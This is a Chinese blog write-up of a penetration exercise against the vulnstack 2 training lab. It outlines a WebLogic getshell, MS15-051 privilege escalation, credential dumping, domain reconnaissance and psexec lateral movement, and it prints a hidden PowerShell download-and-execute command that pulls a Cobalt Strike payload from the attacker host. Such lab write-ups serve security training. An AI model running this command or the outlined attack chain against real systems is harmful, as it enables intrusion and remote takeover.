ATT&CK 实战 - 红日安全 vulnstack(二)渗透记录

最新推荐文章于 2024-05-03 14:06:03 发布
最新推荐文章于 2024-05-03 14:06:03 发布
阅读量2.2k 收藏 4
点赞数 1
分类专栏: 安全文章
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/110189953
版权

前言:

三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。

默认没有开启Web服务,来到C:\Oracle\Middleware\user_projects\domains\base_domain\bin 路径,使用管理员依次执行

环境说明
 

内网网段:10.10.10.1/24

DMZ网段:192.168.111.1/24

测试机地址:192.168.111.11(Windows)

防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):

deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
配置信息

DC
IP:10.10.10.10
OS:Windows 2012(64)
应用:AD域

WEB
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008(64)
应用:Weblogic 10.3.6 MSSQL 2008

PC
IP1:10.10.10.201
IP2:192.168.111.201
OS:Windows 7(32)

攻击机
IP:192.168.111.11
OS:Windows 10(64)

 

渗透过程:

1、扫描一下端口

7001端口是weblogic的默认端口,并且是10.3.6版本,好家伙直接就getshell了。

2、反弹到CS

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.111.11:8080/a'))"

3、查看版本信息 win2008 r2。

4、直接试一试MS15-051提权漏洞。

5、抓一下密码

6、获取域名

7、查询一下域用户。

8、查看一下域控制器。

9、查询一下域控主机名

10、看一下他的ip是10.10.10.10

11、使用arp探测一下内网机器及端口。

12、后面同第一个靶场一样,好家伙直接psexec就上线了,暂不表。

daxi0ng
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
ATT&CK-车联网安全.xlsx
11-17
ATT&CK-车联网安全
渗透测试】vulnstack2-渗透思路养成!
m0_74272345的博客
10-01 293
花了一个下午到晚上十点的时间,尽量不借助WP试着打了一次(但还是略看了一点),目的是想形成自己的方法论和渗透思路。但很明显思路还不成熟,不够熟练。这是第次打vulnstack2,上次还是6月份的时候,这次选择了纯MSF打法,仍然暴露出MSF的一些局限性,还是要配合CS来打本次未完成的两个问题横向移动到PC黄金票据生成(上次纯CS打法是解决了这个问题的)
ATT&CK 实战 - 红日安全 vulnstack (一)
洛柒尘的博客
08-20 4559
前言 1 | 环境搭建 | 1.0 | 靶场介绍 | ATT&CK实战系列—红队实战(一)是红日安全团队出品的一个实战环境,该靶场模拟真实环境。 1.0.0 | 靶场信息 | 靶场名: vulnstack 1 下载链接: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机数量: 3 1.0.1 | 虚拟机配置 | 所有主机密码为:hongrisec@2019 密码同一修改为:hongrisec@2021 攻击机 名称
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 1385
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
ATT&CK 实战 - 红日安全 vulnstack(一)渗透记录
daxi0ng的博客
11-26 2388
1、下载好镜像文件。 2、直接vmware启动即可。 这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131) 设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130) 设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141) 这样win10就可以访问win7,但不能直接访问win08和win2k3。 三台靶机的初始密码都是ho
ATT&CK 实战 - 红日安全 vulnstack(三)渗透记录
daxi0ng的博客
12-02 2694
1、大概拓扑用一下先知老哥这个图。我加了一个攻击机kail 192.168.1.128 https://xz.aliyun.com/t/6988 渗透过程: 话说我下载下来centos就是root权限登录状态。不过测试流程还是要的。 1、用msf测了一下版本 2、跑一下端口 3、跑一下目录,发现配置文件的备份文件 4、登陆一下数据库 5、查看一下密码,加密的,并且没有权限改密文。 6、joomla后台漏洞比较多的,所以想着添加一个管理员进后台。正好官方文档就有.
红日安全vulnstack-ATT&CK实战系列 红队实战()
遇事不决冲冲冲
02-05 6455
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
红日安全ATTCK靶机实战系列之vulnstack4
黑白的博客
04-25 8169
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
遇事不决冲冲冲
12-25 1万+
一.介绍 vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019 整体思路 信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃
红日安全ATTCK靶机实战系列之vulnstack1
黑白的博客
04-13 7113
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 边下载着,可以开始vmware的网络配置 下图为官方给出的,从虚拟机网络来看 攻击者:kali+windows的攻击机 VM1:对外边界服务器,win7 VM2:域成员,2003 VM3:域控,2008 所以这中间出现两个网段,一个外网网段,一个内网网段 鉴于需要两个网段,我们需要在vmware上做一些配置 首先,用一
红日安全vulnstack-ATT&CK实战系列 红队实战(四)
遇事不决冲冲冲
03-29 8424
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 .环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK手册(修改版)
09-16
7. **持续监控与更新**:由于网络安全环境变化快速,ATT&CK手册的修改版会不断跟进并记录新的威胁,强调持续监控和学习的重要性。 8. **企业应用**:企业可以利用ATT&CK框架评估自身安全态势,进行风险分析,并设计...
解决黑群晖切换网络环境后无法访问的问题
热门推荐
daxi0ng的博客
11-19 1万+
问题启始:给我的老笔记本搭了一个黑群晖5.2版本,然后为了平时维护,搬到了公司,但是换了网络环境之后,无法访问nas页面,并且公司路由器加了审计。随即想到使用两台笔记本搭建局域网的方式安全地解决。 所需工具: 1、一台连上wifi的笔记本(称为笔记本A) 2、搭建了黑群晖系统的笔记本(称为笔记本B) 3、一根网线 步骤: 1、使用一根网线连接两台电脑的网口。 2、进入网络适配器设置页面。 3、修改局域网IPV4协议,注意IP地址和网关要与笔记本B设置的IP同C段,例如我的笔记本B,IP为
解决笔记本WIFI共享网络给黑群晖
daxi0ng的博客
11-19 2832
见上文《解决黑群晖切换网络环境后无法访问的问题》 问题启始:笔记本A可以访问黑群晖后,想要frp到公网。但是发现笔记本B没有联网。 步骤: 1、启动笔记本A WIFI的共享功能。 2、这时笔记本A的有线网卡网段变为192.168.137.1。 3、修改笔记本B的IP为192.168.137.xxx,网关为192.168.137.1。我这里图省事就直接给他弄成DHCP模式了。 4、修改笔记本B的DNS为 nameserver 114.114.114.114 5、现在就可以连通外
渗透测试常用端口利用总结
daxi0ng的博客
07-29 928
端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dh...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值